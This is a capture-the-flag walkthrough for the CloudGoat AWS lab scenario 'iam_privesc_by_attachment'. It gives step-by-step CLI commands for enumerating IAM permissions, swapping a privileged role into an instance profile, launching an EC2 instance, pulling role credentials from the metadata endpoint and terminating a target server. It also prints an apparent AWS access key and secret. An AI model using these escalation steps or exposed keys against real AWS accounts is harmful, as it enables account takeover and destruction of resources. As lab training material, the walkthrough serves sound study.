Cloudgoat AWS CTF solution- Scenerio 5 (iam_privesc_by_attachment)

Scenario: iam_privesc_by_attachment

Deployment:

git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py 
./cloudgoat.py create iam_privesc_by_attachment
~/.aws/credentials

Scenario Resources

• 1 VPC with: EC2 x 1
• 1 IAM User

Scenario Start(s)

1. IAM User “Kerrigan”

Scenario Goal(s)

Delete the EC2 instance “cg-super-critical-security-server”

Summary

Starting with a very limited set of permissions, the attacker is able to leverage the instance-profile-attachment permissions to create a new EC2 instance with significantly greater privileges than their own. With access to this new EC2 instance, the attacker gains full administrative powers within the target account and is able to accomplish the scenario’s goal — deleting the cg-super-critical-security-server and paving the way for further nefarious actions.

Exploitation Route(s)

Walkthrough — IAM User “kerrigan”

1. Starting as the IAM user “Kerrigan,” the attacker uses their limited privileges to explore the environment.

a. Used pacu’s “iam__bruteforce_permissions” module to enumerate permissions-

run iam__bruteforce_permissions

ec2:                                                                                                                                                        
    describe_iam_instance_profile_associations                                                                                                                
    describe_instances                                                                                                                                        
    describe_security_groups                                                                                                                                  
    describe_subnets                                                                                                                                          
    describe_vpcs                                                                                                                                             
    get_associated_enclave_certificate_iam_roles                                                                                                              
    get_console_screenshot                                                                                                                                    
    get_host_reservation_purchase_preview                                                                                                                     
                                                                                                                                                              
  s3:                                                                                                                                                         
    get_object_torrent                                                                                                                                        
    head_bucket

b. Using iam-enumerate to Bruteforce permissions.

git clone https://github.com/andresriancho/enumerate-iam.git
cd enumerate-iam/
pip3 install -r requirements.txt
cd enumerate_iam
git clone https://github.com/aws/aws-sdk-js.git
python3 generate_bruteforce_tests.py

after downloading aws-sdk-js in “enumerate_iam” folder run the generate_bruteforce_tests.py script.

c. Running “enumerate-iam”

python3 enumerate-iam.py --access-key AKIA4SM4ZEUHX7V5LYEU --secret-key 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

2. Checking running ec2 instances using ec2:DescribeInstances-

aws ec2 describe-instances --region us-east-1 --profile kerrigan --output text

3. Checking available instance profiles-

aws iam list-instance-profiles --profile kerrigan

We found a interesting instance profile “arn:aws:iam::864154101007:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22” with role “cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22”.

4. Let’s list roles as we have list-roles permissions-

aws iam list-roles --profile kerrigan

We found 2 interesting roles-

cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22 and cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22 and by looking at the name “mighty” one seems more interesting.

5. Let’s try to add “mighty” role to the instance profile.

Note: Our enumeration tools like pacu or iam-enumerate were unable to determine these four permissions-

“iam:AddRoleToInstanceProfile”,“iam:RemoveRoleFromInstanceProfile”, “ec2:AssociateIamInstanceProfile”,”ec2:RunInstances”

but upon manually checking I found our user has these additional permissions..

aws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22  --profile kerrigan

we got an error “Cannot exceed quota for InstanceSessionsPerInstanceProfile: 1”. Let’s try to remove the existing attached role and try to add “mighty” role-

aws iam remove-role-from-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22 --profile kerrigan
aws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22  --profile kerrigan

we didn’t got any error this time

6. Now we can use “AssociateIamInstanceProfile” permission to associate this profile(“cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22”) with running ec2.

aws ec2 associate-iam-instance-profile --iam-instance-profile file://instance_profile.json --instance-id "i-0f1a8f37275d27fcd" --profile kerrigan --region
 us-east-1

7. No we are ready to spin an ec2 instance with full permissions

a) Creating ec2 ssh_key_pair

aws ec2 create-key-pair --key-name pwned --profile kerrigan --query 'KeyMaterial' --region us-east-1 --output text > pwned.pem

b) Running ec2-

aws ec2 describe-security-groups --profile kerrigan --region us-east-1
aws ec2 describe-subnets --profile kerrigan --region us-east-1

aws ec2 run-instances --image-id ami-0a313d6098716f372 --instance-type t2.micro --iam-instance-profile Arn=arn:aws:iam::864154101007:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgid7c11loyvlf --key-name pwned --profile kerrigan --subnet-id subnet-07be3953f5accbd47 --security-group-ids sg-0523b1376503ede0a --region us-east-1

Then use describeinstance to get public ip

8. Logging in and fetching credentials from this instance-

ssh -i pwned.pem ubuntu@54.145.230.120
curl 169.254.169.254/latest/meta-data/iam/security-credentials/

OR

We can directly install aws cli withing the ec2 instance and then run the commands within ec2 cli.

9. Using these credentials to delete “cg-super-critical-security-server”

#Determining instance id
aws ec2 describe-instances --region us-east-1 --profile ec2_role

“i-0064345de3f005c7a”

aws ec2 terminate-instances --instance-ids i-0064345de3f005c7a --region us-east-1 --profile ec2_role

References:

https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/iam_privesc_by_attachment/README.md